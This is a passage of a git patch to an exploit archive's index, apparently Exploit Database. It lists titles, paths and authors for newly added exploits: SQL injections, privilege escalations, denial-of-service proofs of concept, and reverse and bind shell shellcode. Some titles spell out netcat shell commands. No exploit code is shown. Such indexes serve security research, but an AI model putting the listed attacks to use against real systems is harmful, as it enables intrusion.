From 9aef664a7e2a0e2f8792781412ce60328f904f16 Mon Sep 17 00:00:00 2001 
From: Offensive Security Date: Tue, 7 Mar 2017 05:01:20 +0000 Subject: [PATCH] DB: 2017-03-07 31 new exploits iSQL 1.0 - isql_main.c Buffer Overflow (PoC) iSQL 1.0 - 'isql_main.c' Buffer Overflow (PoC) Memcached 1.4.33 - 'Crash' PoC Memcached 1.4.33 - 'Add' PoC Memcached 1.4.33 - 'sasl' PoC Memcached 1.4.33 - 'Crash' (PoC) Memcached 1.4.33 - 'Add' (PoC) Memcached 1.4.33 - 'sasl' (PoC) Windows 10 (x86/x64) WLAN AutoConfig - Denial of Service (POC) Windows 10 (x86/x64) WLAN AutoConfig - Denial of Service (PoC) Microsoft Windows gdi32.dll - EMR_SETDIBITSTODEVICE Heap-Based Out-of-Bounds Reads / Memory Disclosure Microsoft Windows - 'gdi32.dll' EMR_SETDIBITSTODEVICE Heap-Based Out-of-Bounds Reads / Memory Disclosure Microsoft Office PowerPoint 2010 GDI - 'GDI32!ConvertDxArray' Insufficient Bounds Check Microsoft Office PowerPoint 2010 - GDI 'GDI32!ConvertDxArray' Insufficient Bounds Check Linux Kernel 4.4.0 (Ubuntu) - DCCP Double-Free PoC Linux Kernel 4.4.0 (Ubuntu) - DCCP Double-Free (PoC) Conext ComBox 865-1058 - Denial of Service Microsoft Internet Explorer 11 (Windows 10) - VBScript Memory Corruption Proof-of-Concept Exploit (MS16-051) Microsoft Internet Explorer 11 (Windows 10) - VBScript Memory Corruption (PoC) (MS16-051) Linux Kernel 2.6.22 < 3.9 - 'Dirty COW' /proc/self/mem Race Condition PoC (Write Access) Linux Kernel 2.6.22 < 3.9 - 'Dirty COW' /proc/self/mem Race Condition (PoC) (Write Access) Linux Kernel 2.6.22 < 3.9 - 'Dirty COW' PTRACE_POKEDATA Race Condition PoC (Write Access) Linux Kernel 2.6.22 < 3.9 - 'Dirty COW' PTRACE_POKEDATA Race Condition (PoC) (Write Access) CyberGhost 6.0.4.2205 - Privilege Escalation FTPShell Client 6.53 - Buffer Overflow Linux/x86-64 - /bin/sh Shellcode Linux/x86-64 - /bin/sh Shellcode (34 bytes) Linux/x86-64 - Reverse Shell Shellcode Linux/x86-64 - Reverse Shell Shellcode (134 bytes) Linux/x86-64 - XOR Encode execve Shellcode Linux/x86-64 - XOR Encode execve Shellcode (84 bytes) Linux/x86_64 - Bind 5600 TCP Port - Shellcode 
(87 bytes) Linux/x86_64 - execve /bin/sh Shellcode (22 bytes) Linux/x86-64 - Bind 5600 TCP Port - Shellcode (87 bytes) Linux/x86-64 - execve /bin/sh Shellcode (22 bytes) Linux/x86_64 - Random Listener Shellcode (54 bytes) Linux/x86-64 - Random Listener Shellcode (54 bytes) Wordpress < 4.7.1 - Username Enumeration WordPress < 4.7.1 - Username Enumeration Advanced Bus Booking Script 2.04 - SQL Injection Entrepreneur Bus Booking Script 3.03 - 'hid_Busid' Parameter SQL Injection Single Theater Booking Script - 'newsid' Parameter SQL Injection Responsive Events & Movie Ticket Booking Script - SQL Injection Online Cinema and Event Booking Script 2.01 - 'newsid' Parameter SQL Injection Redbus Clone Script 3.05 - 'hid_Busid' Parameter SQL Injection Groupon Clone Script 3.01 - 'catid' Parameter SQL Injection Naukri Clone Script 3.02 - 'type' Parameter SQL Injection Yellow Pages Clone Script 1.3.4 - SQL Injection Advanced Matrimonial Script 2.0.3 - SQL Injection Advanced Real Estate Script 4.0.6 - SQL Injection PHP Classifieds Rental Script 3.6.0 - 'scatid' Parameter SQL Injection Entrepreneur B2B Script 2.0.4 - 'id' Parameter SQL Injection PHP Matrimonial Script 3.0 - SQL Injection MLM Binary Plan Script 2.0.5 - SQL Injection MLM Forced Matrix 2.0.7 - SQL Injection MLM Forex Market Plan Script 2.0.1 - SQL Injection MLM Membership Plan Script 2.0.5 - SQL Injection Multireligion Responsive Matrimonial Script 4.7.1 - SQL Injection Network Community Script 3.0.2 - SQL Injection PHP B2B Script 3.05 - SQL Injection Responsive Matrimonial Script 4.0.1 - SQL Injection Schools Alert Management Script 2.01 - 'list_id' Parameter SQL Injection Select Your College Script 2.01 - SQL Injection Social Network Script 3.01 - 'id' Parameter SQL Injection Website Broker Script 3.02 - 'view' Parameter SQL Injection WordPress Multiple Plugins - Arbitrary File Upload Deluge Web UI 1.3.13 - Cross-Site Request Forgery --- files.csv | 67 ++++++++---- platforms/hardware/dos/41537.py | 44 ++++++++ 
platforms/json/webapps/41541.html | 173 ++++++++++++++++++++++++++++++ platforms/php/webapps/41497.php | 2 +- platforms/php/webapps/41512.txt | 20 ++++ platforms/php/webapps/41513.txt | 18 ++++ platforms/php/webapps/41514.txt | 27 +++++ platforms/php/webapps/41515.txt | 27 +++++ platforms/php/webapps/41516.txt | 27 +++++ platforms/php/webapps/41517.txt | 17 +++ platforms/php/webapps/41518.txt | 25 +++++ platforms/php/webapps/41519.txt | 19 ++++ platforms/php/webapps/41520.txt | 22 ++++ platforms/php/webapps/41521.txt | 31 ++++++ platforms/php/webapps/41522.txt | 24 +++++ platforms/php/webapps/41523.txt | 25 +++++ platforms/php/webapps/41524.txt | 30 ++++++ platforms/php/webapps/41525.txt | 26 +++++ platforms/php/webapps/41526.txt | 25 +++++ platforms/php/webapps/41527.txt | 27 +++++ platforms/php/webapps/41528.txt | 27 +++++ platforms/php/webapps/41529.txt | 27 +++++ platforms/php/webapps/41530.txt | 17 +++ platforms/php/webapps/41531.txt | 28 +++++ platforms/php/webapps/41532.txt | 28 +++++ platforms/php/webapps/41533.txt | 27 +++++ platforms/php/webapps/41534.txt | 26 +++++ platforms/php/webapps/41535.txt | 21 ++++ platforms/php/webapps/41536.txt | 22 ++++ platforms/php/webapps/41539.txt | 27 +++++ platforms/php/webapps/41540.py | 58 ++++++++++ platforms/windows/local/41538.cs | 38 +++++++ platforms/windows/remote/41511.py | 68 ++++++++++++ 33 files changed, 1071 insertions(+), 19 deletions(-) create mode 100755 platforms/hardware/dos/41537.py create mode 100755 platforms/json/webapps/41541.html create mode 100755 platforms/php/webapps/41512.txt create mode 100755 platforms/php/webapps/41513.txt create mode 100755 platforms/php/webapps/41514.txt create mode 100755 platforms/php/webapps/41515.txt create mode 100755 platforms/php/webapps/41516.txt create mode 100755 platforms/php/webapps/41517.txt create mode 100755 platforms/php/webapps/41518.txt create mode 100755 platforms/php/webapps/41519.txt create mode 100755 platforms/php/webapps/41520.txt create mode 
100755 platforms/php/webapps/41521.txt
create mode 100755 platforms/php/webapps/41522.txt
create mode 100755 platforms/php/webapps/41523.txt
create mode 100755 platforms/php/webapps/41524.txt
create mode 100755 platforms/php/webapps/41525.txt
create mode 100755 platforms/php/webapps/41526.txt
create mode 100755 platforms/php/webapps/41527.txt
create mode 100755 platforms/php/webapps/41528.txt
create mode 100755 platforms/php/webapps/41529.txt
create mode 100755 platforms/php/webapps/41530.txt
create mode 100755 platforms/php/webapps/41531.txt
create mode 100755 platforms/php/webapps/41532.txt
create mode 100755 platforms/php/webapps/41533.txt
create mode 100755 platforms/php/webapps/41534.txt
create mode 100755 platforms/php/webapps/41535.txt
create mode 100755 platforms/php/webapps/41536.txt
create mode 100755 platforms/php/webapps/41539.txt
create mode 100755 platforms/php/webapps/41540.py
create mode 100755 platforms/windows/local/41538.cs
create mode 100755 platforms/windows/remote/41511.py
diff --git a/files.csv b/files.csv
index 371558c10..b0be4d624 100644
--- a/files.csv
+++ b/files.csv
@@ -5155,7 +5155,7 @@ id,file,description,date,author,platform,type,port
 39928,platforms/osx/dos/39928.c,"Apple Mac OSX Kernel - Use-After-Free Due to Bad Locking in IOAcceleratorFamily2",2016-06-10,"Google Security Research",osx,dos,0
 39929,platforms/multiple/dos/39929.c,"Apple Mac OSX / iOS Kernel - UAF Racing getProperty on IOHDIXController and testNetBootMethod on IOHDIXControllerUserClient",2016-06-10,"Google Security Research",multiple,dos,0
 39930,platforms/osx/dos/39930.c,"Apple Mac OSX Kernel - GeForce GPU Driver Stack Buffer Overflow",2016-06-10,"Google Security Research",osx,dos,0
-39939,platforms/linux/dos/39939.rb,"iSQL 1.0 - isql_main.c Buffer Overflow (PoC)",2016-06-13,HaHwul,linux,dos,0
+39939,platforms/linux/dos/39939.rb,"iSQL 1.0 - 'isql_main.c' Buffer Overflow (PoC)",2016-06-13,HaHwul,linux,dos,0
 39940,platforms/linux/dos/39940.txt,"Foxit PDF Reader 1.0.1.0925 - CPDF_StreamContentParser::~CPDF_StreamContentParser Heap Based Memory Corruption",2016-06-13,"Google Security Research",linux,dos,0
 39941,platforms/linux/dos/39941.txt,"Foxit PDF Reader 1.0.1.0925 - CPDF_DIBSource::TranslateScanline24bpp Out-of-Bounds Read",2016-06-13,"Google Security Research",linux,dos,0
 39942,platforms/linux/dos/39942.txt,"Foxit PDF Reader 1.0.1.0925 - CFX_WideString::operator= Invalid Read",2016-06-13,"Google Security Research",linux,dos,0
@@ -5259,9 +5259,9 @@ id,file,description,date,author,platform,type,port
 40685,platforms/windows/dos/40685.html,"Microsoft Internet Explorer 9 - MSHTML CAttrArray Use-After-Free (MS14-056)",2016-11-02,Skylined,windows,dos,0
 40687,platforms/hardware/dos/40687.txt,"SunellSecurity NVR / Camera - Denial of Service",2016-11-02,qwsj,hardware,dos,0
 40691,platforms/windows/dos/40691.html,"Microsoft Internet Explorer 11 - MSHTML CView::CalculateImageImmunity Use-After-Free",2016-11-02,Skylined,windows,dos,0
-40695,platforms/linux/dos/40695.c,"Memcached 1.4.33 - 'Crash' PoC",2016-11-01,"p0wd3r / dawu",linux,dos,0
-40696,platforms/linux/dos/40696.c,"Memcached 1.4.33 - 'Add' PoC",2016-11-01,"p0wd3r / dawu",linux,dos,0
-40697,platforms/linux/dos/40697.c,"Memcached 1.4.33 - 'sasl' PoC",2016-11-01,"p0wd3r / dawu",linux,dos,0
+40695,platforms/linux/dos/40695.c,"Memcached 1.4.33 - 'Crash' (PoC)",2016-11-01,"p0wd3r / dawu",linux,dos,0
+40696,platforms/linux/dos/40696.c,"Memcached 1.4.33 - 'Add' (PoC)",2016-11-01,"p0wd3r / dawu",linux,dos,0
+40697,platforms/linux/dos/40697.c,"Memcached 1.4.33 - 'sasl' (PoC)",2016-11-01,"p0wd3r / dawu",linux,dos,0
 40699,platforms/windows/dos/40699.txt,"Axessh 4.2 - Denial of Service",2016-11-03,hyp3rlinx,windows,dos,0
 40703,platforms/windows/dos/40703.pl,"Microsoft Windows Server 2008/2012 - LDAP RootDSE Netlogon Denial of Service",2016-11-08,"Todor Donev",windows,dos,0
 40722,platforms/windows/dos/40722.html,"Microsoft Internet Explorer 9 - MSHTML CPtsTextParaclient::CountApes Out-of-Bounds Read",2016-11-07,Skylined,windows,dos,0
@@ -5300,7 +5300,7 @@ id,file,description,date,author,platform,type,port
 40878,platforms/windows/dos/40878.txt,"Microsoft Edge - CMarkup::Ensure­Delete­CFState Use-After-Free (MS15-125)",2016-12-06,Skylined,windows,dos,0
 40879,platforms/windows/dos/40879.html,"Microsoft Internet Explorer 9 - CDoc::Execute­Script­Uri Use-After-Free (MS13-009)",2016-12-06,Skylined,windows,dos,0
 40880,platforms/windows/dos/40880.txt,"Microsoft Edge - CBase­Scriptable::Private­Query­Interface Memory Corruption (MS16-068)",2016-12-06,Skylined,windows,dos,0
-40883,platforms/windows/dos/40883.py,"Windows 10 (x86/x64) WLAN AutoConfig - Denial of Service (POC)",2016-12-06,"Jeremy Brown",windows,dos,0
+40883,platforms/windows/dos/40883.py,"Windows 10 (x86/x64) WLAN AutoConfig - Denial of Service (PoC)",2016-12-06,"Jeremy Brown",windows,dos,0
 40885,platforms/windows/dos/40885.py,"Dual DHCP DNS Server 7.29 - Denial of Service",2016-12-07,R-73eN,windows,dos,0
 40886,platforms/hardware/dos/40886.py,"TP-LINK TD-W8951ND - Denial of Service",2016-12-07,"Persian Hack Team",hardware,dos,0
 40888,platforms/linux/dos/40888.py,"OpenSSH 7.2 - Denial of Service",2016-12-07,"SecPod Research",linux,dos,0
@@ -5360,7 +5360,7 @@ id,file,description,date,author,platform,type,port
 41222,platforms/windows/dos/41222.py,"Microsoft Windows 10 - SMBv3 Tree Connect (PoC)",2017-02-01,"laurent gaffie",windows,dos,0
 41232,platforms/android/dos/41232.txt,"Google Android - 'rkp_set_init_page_ro' RKP Memory Corruption",2017-02-02,"Google Security Research",android,dos,0
 41278,platforms/openbsd/dos/41278.txt,"OpenBSD HTTPd < 6.0 - Memory Exhaustion Denial of Service",2017-02-07,PierreKimSec,openbsd,dos,80
-41363,platforms/windows/dos/41363.txt,"Microsoft Windows gdi32.dll - EMR_SETDIBITSTODEVICE Heap-Based Out-of-Bounds Reads / Memory Disclosure",2017-02-15,"Google Security Research",windows,dos,0
+41363,platforms/windows/dos/41363.txt,"Microsoft Windows - 'gdi32.dll' EMR_SETDIBITSTODEVICE Heap-Based Out-of-Bounds Reads / Memory Disclosure",2017-02-15,"Google Security Research",windows,dos,0
 41350,platforms/linux/dos/41350.c,"Linux Kernel 3.10.0 (CentOS7) - Denial of Service",2017-02-12,FarazPajohan,linux,dos,0
 41351,platforms/android/dos/41351.txt,"LG G4 - lgdrmserver Binder Service Multiple Race Conditions",2017-02-14,"Google Security Research",android,dos,0
 41352,platforms/android/dos/41352.txt,"LG G4 - lghashstorageserver Directory Traversal",2017-02-14,"Google Security Research",android,dos,0
@@ -5374,7 +5374,7 @@ id,file,description,date,author,platform,type,port
 41369,platforms/hardware/dos/41369.txt,"Cisco ASA - WebVPN CIFS Handling Buffer Overflow",2017-02-15,"Google Security Research",hardware,dos,0
 41417,platforms/windows/dos/41417.txt,"Microsoft Office PowerPoint 2010 - 'MSO!Ordinal5429' Missing Length Check Heap Corruption",2017-02-21,"Google Security Research",windows,dos,0
 41418,platforms/windows/dos/41418.txt,"Microsoft Office PowerPoint 2010 - MSO/OART Heap Out-of-Bounds Access",2017-02-21,"Google Security Research",windows,dos,0
-41419,platforms/windows/dos/41419.txt,"Microsoft Office PowerPoint 2010 GDI - 'GDI32!ConvertDxArray' Insufficient Bounds Check",2017-02-21,"Google Security Research",windows,dos,0
+41419,platforms/windows/dos/41419.txt,"Microsoft Office PowerPoint 2010 - GDI 'GDI32!ConvertDxArray' Insufficient Bounds Check",2017-02-21,"Google Security Research",windows,dos,0
 41420,platforms/multiple/dos/41420.txt,"Adobe Flash - MP4 AMF Parsing Overflow",2017-02-21,"Google Security Research",multiple,dos,0
 41421,platforms/multiple/dos/41421.txt,"Adobe Flash - SWF Stack Corruption",2017-02-21,"Google Security Research",multiple,dos,0
 41422,platforms/multiple/dos/41422.txt,"Adobe Flash - Use-After-Free in Applying Bitmap Filter",2017-02-21,"Google Security Research",multiple,dos,0
@@ -5383,9 +5383,10 @@ id,file,description,date,author,platform,type,port
 41426,platforms/windows/dos/41426.txt,"EasyCom For PHP 4.0.0 - Denial of Service",2017-02-22,hyp3rlinx,windows,dos,0
 41434,platforms/multiple/dos/41434.html,"Google Chrome - 'layout' Out-of-Bounds Read",2017-02-22,"Google Security Research",multiple,dos,0
 41454,platforms/windows/dos/41454.html,"Microsoft Edge and Internet Explorer - 'HandleColumnBreakOnColumnSpanningElement' Type Confusion",2017-02-24,"Google Security Research",windows,dos,0
-41457,platforms/linux/dos/41457.c,"Linux Kernel 4.4.0 (Ubuntu) - DCCP Double-Free PoC",2017-02-26,"Andrey Konovalov",linux,dos,0
+41457,platforms/linux/dos/41457.c,"Linux Kernel 4.4.0 (Ubuntu) - DCCP Double-Free (PoC)",2017-02-26,"Andrey Konovalov",linux,dos,0
 41474,platforms/windows/dos/41474.py,"BlueIris 4.5.1.4 - Denial of Service",2017-02-28,"Peter Baris",windows,dos,0
 41475,platforms/windows/dos/41475.py,"Synchronet BBS 3.16c - Denial of Service",2017-02-28,"Peter Baris",windows,dos,0
+41537,platforms/hardware/dos/41537.py,"Conext ComBox 865-1058 - Denial of Service",2017-03-02,"Mark Liapustin and Arik Kublanov",hardware,dos,0
 3,platforms/linux/local/3.c,"Linux Kernel 2.2.x / 2.4.x (RedHat) - 'ptrace/kmod' Privilege Escalation",2003-03-30,"Wojciech Purczynski",linux,local,0
 4,platforms/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Buffer Overflow",2003-04-01,Andi,solaris,local,0
 12,platforms/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,linux,local,0
@@ -8674,7 +8675,7 @@ id,file,description,date,author,platform,type,port
 40072,platforms/windows/local/40072.txt,"InstantHMI 6.1 - Privilege Escalation",2016-07-08,sh4d0wman,windows,local,0
 40107,platforms/windows/local/40107.rb,"Microsoft Windows 7 < 10 / 2008 < 2012 (x86/x64) - Secondary Logon Handle Privilege Escalation (MS16-032) (Metasploit)",2016-07-13,Metasploit,windows,local,0
 40145,platforms/windows/local/40145.txt,"Rapid7 AppSpider 6.12 - Privilege Escalation",2016-07-25,LiquidWorm,windows,local,0
-40118,platforms/windows/local/40118.txt,"Microsoft Internet Explorer 11 (Windows 10) - VBScript Memory Corruption Proof-of-Concept Exploit (MS16-051)",2016-06-22,"Brian Pak",windows,local,0
+40118,platforms/windows/local/40118.txt,"Microsoft Internet Explorer 11 (Windows 10) - VBScript Memory Corruption (PoC) (MS16-051)",2016-06-22,"Brian Pak",windows,local,0
 40132,platforms/windows/local/40132.txt,"Wowza Streaming Engine 4.5.0 - Local Privilege Escalation",2016-07-20,LiquidWorm,windows,local,0
 40141,platforms/bsd/local/40141.c,"NetBSD mail.local(8) - Privilege Escalation (NetBSD-SA2016-006)",2016-07-21,akat1,bsd,local,0
 40148,platforms/windows/local/40148.py,"Mediacoder 0.8.43.5852 - '.m3u' SEH Exploit",2016-07-25,"Karn Ganeshen",windows,local,0
@@ -8745,7 +8746,7 @@ id,file,description,date,author,platform,type,port
 40606,platforms/windows/local/40606.cpp,"Microsoft Windows Edge/Internet Explorer - Isolated Private Namespace Insecure DACL Privilege Escalation (MS16-118)",2016-10-20,"Google Security Research",windows,local,0
 40607,platforms/windows/local/40607.cpp,"Microsoft Windows Edge/Internet Explorer - Isolated Private Namespace Insecure Boundary Descriptor Privilege Escalation (MS16-118)",2016-10-20,"Google Security Research",windows,local,0
 40608,platforms/windows/local/40608.cs,"Microsoft Windows - NtLoadKeyEx Read Only Hive Arbitrary File Write Privilege Escalation (MS16-124)",2016-10-20,"Google Security Research",windows,local,0
-40611,platforms/linux/local/40611.c,"Linux Kernel 2.6.22 < 3.9 - 'Dirty COW' /proc/self/mem Race Condition PoC (Write Access)",2016-10-19,"Phil Oester",linux,local,0
+40611,platforms/linux/local/40611.c,"Linux Kernel 2.6.22 < 3.9 - 'Dirty COW' /proc/self/mem Race Condition (PoC) (Write Access)",2016-10-19,"Phil Oester",linux,local,0
 40616,platforms/linux/local/40616.c,"Linux Kernel 2.6.22 < 3.9 (x86/x64) - 'Dirty COW' /proc/self/mem Race Condition Privilege Escalation (SUID)",2016-10-21,"Robin Verton",linux,local,0
 40627,platforms/win_x86/local/40627.c,"Microsoft Windows (x86) - 'NDISTAPI' Privilege Escalation (MS11-062)",2016-10-24,"Tomislav Paskalev",win_x86,local,0
 40630,platforms/windows/local/40630.py,"Network Scanner 4.0.0 - SEH Local Buffer Overflow",2016-10-25,n30m1nd,windows,local,0
@@ -8760,7 +8761,7 @@ id,file,description,date,author,platform,type,port
 40688,platforms/linux/local/40688.rb,"Linux Kernel (Ubuntu / Fedora / RedHat) - 'Overlayfs' Privilege Escalation (Metasploit)",2016-11-02,Metasploit,linux,local,0
 40679,platforms/linux/local/40679.sh,"MySQL / MariaDB / PerconaDB 5.5.x/5.6.x/5.7.x - ('root' System User) Privilege Escalation",2016-11-01,"Dawid Golunski",linux,local,0
 40710,platforms/aix/local/40710.sh,"IBM AIX 5.3/6.1/7.1/7.2 - 'lquerylv' Privilege Escalation",2016-11-04,"Hector X. Monsegur",aix,local,0
-40838,platforms/linux/local/40838.c,"Linux Kernel 2.6.22 < 3.9 - 'Dirty COW' PTRACE_POKEDATA Race Condition PoC (Write Access)",2016-10-26,"Phil Oester",linux,local,0
+40838,platforms/linux/local/40838.c,"Linux Kernel 2.6.22 < 3.9 - 'Dirty COW' PTRACE_POKEDATA Race Condition (PoC) (Write Access)",2016-10-26,"Phil Oester",linux,local,0
 40759,platforms/linux/local/40759.rb,"Linux Kernel 4.4 (Ubuntu 16.04) - 'BPF' Privilege Escalation (Metasploit)",2016-11-14,Metasploit,linux,local,0
 40741,platforms/windows/local/40741.py,"Avira Antivirus 15.0.21.86 - '.zip' Directory Traversal / Command Execution",2016-11-08,R-73eN,windows,local,0
 40765,platforms/windows/local/40765.cs,"Microsoft Windows - VHDMP Arbitrary Physical Disk Cloning Privilege Escalation (MS16-138)",2016-11-15,"Google Security Research",windows,local,0
@@ -8823,6 +8824,7 @@ id,file,description,date,author,platform,type,port
 41435,platforms/linux/local/41435.txt,"Shutter 0.93.1 - Code Execution",2016-12-26,Prajith,linux,local,0
 41458,platforms/linux/local/41458.c,"Linux Kernel 4.4.0 (Ubuntu) - DCCP Double-Free Privilege Escalation",2017-02-26,"Andrey Konovalov",linux,local,0
 41476,platforms/windows/local/41476.txt,"Cisco AnyConnect Secure Mobility Client 4.3.04027 - Privilege Escalation",2017-02-28,Pcchillin,windows,local,0
+41538,platforms/windows/local/41538.cs,"CyberGhost 6.0.4.2205 - Privilege Escalation",2017-03-06,"Kacper Szurek",windows,local,0
 1,platforms/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Exploit",2003-03-23,kralor,windows,remote,80
 2,platforms/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote Exploit (PoC)",2003-03-24,RoMaNSoFt,windows,remote,80
 5,platforms/windows/remote/5.c,"Microsoft Windows - RPC Locator Service Remote Exploit",2003-04-03,"Marcin Wolak",windows,remote,139
@@ -15306,6 +15308,7 @@ id,file,description,date,author,platform,type,port
 41471,platforms/arm/remote/41471.rb,"MVPower DVR TV-7104HE 1.8.4 115215B9 - Shell Unauthenticated Command Execution (Metasploit)",2017-02-27,Metasploit,arm,remote,0
 41479,platforms/windows/remote/41479.py,"SysGauge 1.5.18 - Buffer Overflow",2017-02-28,"Peter Baris",windows,remote,0
 41480,platforms/hardware/remote/41480.txt,"WePresent WiPG-1500 - Backdoor Account",2017-02-27,"Quentin Olagne",hardware,remote,0
+41511,platforms/windows/remote/41511.py,"FTPShell Client 6.53 - Buffer Overflow",2017-03-04,"Peter Baris",windows,remote,0
 14113,platforms/arm/shellcode/14113.txt,"Linux/ARM - setuid(0) & execve(_/bin/sh___/bin/sh__0) Shellcode (38 bytes)",2010-06-29,"Jonathan Salwan",arm,shellcode,0
 13241,platforms/aix/shellcode/13241.txt,"AIX - execve /bin/sh Shellcode (88 bytes)",2004-09-26,"Georgi Guninski",aix,shellcode,0
 13242,platforms/bsd/shellcode/13242.txt,"BSD - Passive Connection Shellcode (124 bytes)",2000-11-19,Scrippie,bsd,shellcode,0
@@ -15833,7 +15836,7 @@ id,file,description,date,author,platform,type,port
 38094,platforms/lin_x86/shellcode/38094.c,"Linux/x86 - Create file with permission 7775 and exit Shellcode (Generator)",2015-09-07,"Ajith Kp",lin_x86,shellcode,0
 38116,platforms/lin_x86/shellcode/38116.c,"Linux/x86 - execve(_/bin/cat__ [_/bin/cat__ _/etc/passwd_]_ NULL) Shellcode (75 bytes)",2015-09-09,"Ajith Kp",lin_x86,shellcode,0
 38126,platforms/osx/shellcode/38126.c,"OSX/x86-64 - 4444/TPC port bind Nullfree Shellcode (144 bytes)",2015-09-10,"Fitzl Csaba",osx,shellcode,0
-38150,platforms/lin_x86-64/shellcode/38150.txt,"Linux/x86-64 - /bin/sh Shellcode",2015-09-11,"Fanda Uchytil",lin_x86-64,shellcode,0
+38150,platforms/lin_x86-64/shellcode/38150.txt,"Linux/x86-64 - /bin/sh Shellcode (34 bytes)",2015-09-11,"Fanda Uchytil",lin_x86-64,shellcode,0
 38194,platforms/android/shellcode/38194.c,"Google Android - Telnetd (Port 1035) with Parameters Shellcode (248 bytes)",2015-09-15,"Steven Padilla",android,shellcode,0
 38239,platforms/lin_x86-64/shellcode/38239.asm,"Linux/x86-64 - execve Shellcode (22 bytes)",2015-09-18,d4sh&r,lin_x86-64,shellcode,0
 38469,platforms/lin_x86-64/shellcode/38469.c,"Linux/x86-64 - Bindshell 31173 port with Password Shellcode (92 bytes)",2015-10-15,d4sh&r,lin_x86-64,shellcode,0
@@ -15857,7 +15860,7 @@ id,file,description,date,author,platform,type,port
 39390,platforms/lin_x86-64/shellcode/39390.c,"Linux/x86-64 - Polymorphic Execve-Stack Shellcode (47 bytes)",2016-02-01,"Sathish kumar",lin_x86-64,shellcode,0
 39496,platforms/arm/shellcode/39496.c,"Linux/ARM - Connect back to 10.0.0.10:1337 with /bin/sh Shellcode (95 bytes)",2016-02-26,Xeon,arm,shellcode,0
 39519,platforms/win_x86/shellcode/39519.c,"Windows x86 - Download & Run via WebDAV Null Free Shellcode (96 bytes)",2016-03-02,"Sean Dillon",win_x86,shellcode,0
-39578,platforms/lin_x86-64/shellcode/39578.c,"Linux/x86-64 - Reverse Shell Shellcode",2016-03-21,"Sudhanshu Chauhan",lin_x86-64,shellcode,0
+39578,platforms/lin_x86-64/shellcode/39578.c,"Linux/x86-64 - Reverse Shell Shellcode (134 bytes)",2016-03-21,"Sudhanshu Chauhan",lin_x86-64,shellcode,0
 39617,platforms/lin_x86-64/shellcode/39617.c,"Linux/x86-64 - execve(/bin/sh) Shellcode (26 bytes)",2016-03-24,"Ajith Kp",lin_x86-64,shellcode,0
 39624,platforms/lin_x86-64/shellcode/39624.c,"Linux/x86-64 - execve(/bin/sh) Shellcode (25 bytes)",2016-03-28,"Ajith Kp",lin_x86-64,shellcode,0
 39625,platforms/lin_x86-64/shellcode/39625.c,"Linux/x86-64 - execve(/bin/bash) Shellcode (33 bytes)",2016-03-28,"Ajith Kp",lin_x86-64,shellcode,0
@@ -15877,7 +15880,7 @@ id,file,description,date,author,platform,type,port
 39844,platforms/lin_x86-64/shellcode/39844.c,"Linux/x86-64 - Reverse TCP Shell Null Free Shellcode (134 bytes)",2016-05-20,"Sudhanshu Chauhan",lin_x86-64,shellcode,0
 39847,platforms/lin_x86-64/shellcode/39847.c,"Linux/x86-64 - Information Stealer Shellcode (399 bytes)",2016-05-23,"Roziul Hasan Khan Shifat",lin_x86-64,shellcode,0
 39851,platforms/lin_x86/shellcode/39851.c,"Linux/x86 - Bind Shell Port 4444/TCP Shellcode (656 bytes)",2016-05-25,"Brandon Dennis",lin_x86,shellcode,0
-39869,platforms/lin_x86-64/shellcode/39869.c,"Linux/x86-64 - XOR Encode execve Shellcode",2016-05-30,"Roziul Hasan Khan Shifat",lin_x86-64,shellcode,0
+39869,platforms/lin_x86-64/shellcode/39869.c,"Linux/x86-64 - XOR Encode execve Shellcode (84 bytes)",2016-05-30,"Roziul Hasan Khan Shifat",lin_x86-64,shellcode,0
 39885,platforms/multiple/shellcode/39885.c,"Linux/Windows/BSD x86_64 - execve(_/bin//sh__ {_//bin/sh__ _-c__ _cmd_}_ NULL) Execute Command Shellcode (194 bytes)",2016-06-06,odzhancode,multiple,shellcode,0
 39900,platforms/win_x86/shellcode/39900.c,"Windows x86 - WinExec(_cmd.exe__0) Shellcode (184 bytes)",2016-06-07,"Roziul Hasan Khan Shifat",win_x86,shellcode,0
 39901,platforms/lin_x86/shellcode/39901.c,"Linux/x86 - /bin/nc -le /bin/sh -vp13337 Shellcode (56 bytes)",2016-06-07,sajith,lin_x86,shellcode,0
@@ -15913,8 +15916,8 @@ id,file,description,date,author,platform,type,port
 40981,platforms/win_x86-64/shellcode/40981.c,"Windows x64 - Password Protected Bind Shellcode (825 bytes)",2017-01-01,"Roziul Hasan Khan Shifat",win_x86-64,shellcode,0
 41072,platforms/win_x86-64/shellcode/41072.c,"Windows x64 - CreateRemoteThread() DLL Injection Shellcode (584 bytes)",2017-01-15,"Roziul Hasan Khan Shifat",win_x86-64,shellcode,0
 41089,platforms/lin_x86-64/shellcode/41089.c,"Linux/x86-64 - mkdir Shellcode (25 bytes)",2017-01-18,"Ajith Kp",lin_x86-64,shellcode,0
-41128,platforms/lin_x86-64/shellcode/41128.c,"Linux/x86_64 - Bind 5600 TCP Port - Shellcode (87 bytes)",2017-01-19,"Ajith Kp",lin_x86-64,shellcode,0
-41174,platforms/lin_x86-64/shellcode/41174.nasm,"Linux/x86_64 - execve /bin/sh Shellcode (22 bytes)",2017-01-26,"Robert L. Taylor",lin_x86-64,shellcode,0
+41128,platforms/lin_x86-64/shellcode/41128.c,"Linux/x86-64 - Bind 5600 TCP Port - Shellcode (87 bytes)",2017-01-19,"Ajith Kp",lin_x86-64,shellcode,0
+41174,platforms/lin_x86-64/shellcode/41174.nasm,"Linux/x86-64 - execve /bin/sh Shellcode (22 bytes)",2017-01-26,"Robert L. Taylor",lin_x86-64,shellcode,0
 41183,platforms/linux/shellcode/41183.c,"Linux - Multi/Dual mode execve(_/bin/sh__ NULL_ 0) Shellcode (37 bytes)",2017-01-29,odzhancode,linux,shellcode,0
 41220,platforms/linux/shellcode/41220.c,"Linux - Multi/Dual mode Reverse Shell Shellcode (129 bytes)",2017-02-02,odzhancode,linux,shellcode,0
 41282,platforms/lin_x86/shellcode/41282.nasm,"Linux/x86 - Reverse TCP Alphanumeric Staged Shellcode (103 bytes)",2017-02-08,"Snir Levi",lin_x86,shellcode,0
@@ -15924,7 +15927,7 @@ id,file,description,date,author,platform,type,port
 41403,platforms/lin_x86/shellcode/41403.c,"Linux/x86 - SELinux Permissive Mode Switcher Shellcode (45 bytes)",2017-02-20,"Krzysztof Przybylski",lin_x86,shellcode,0
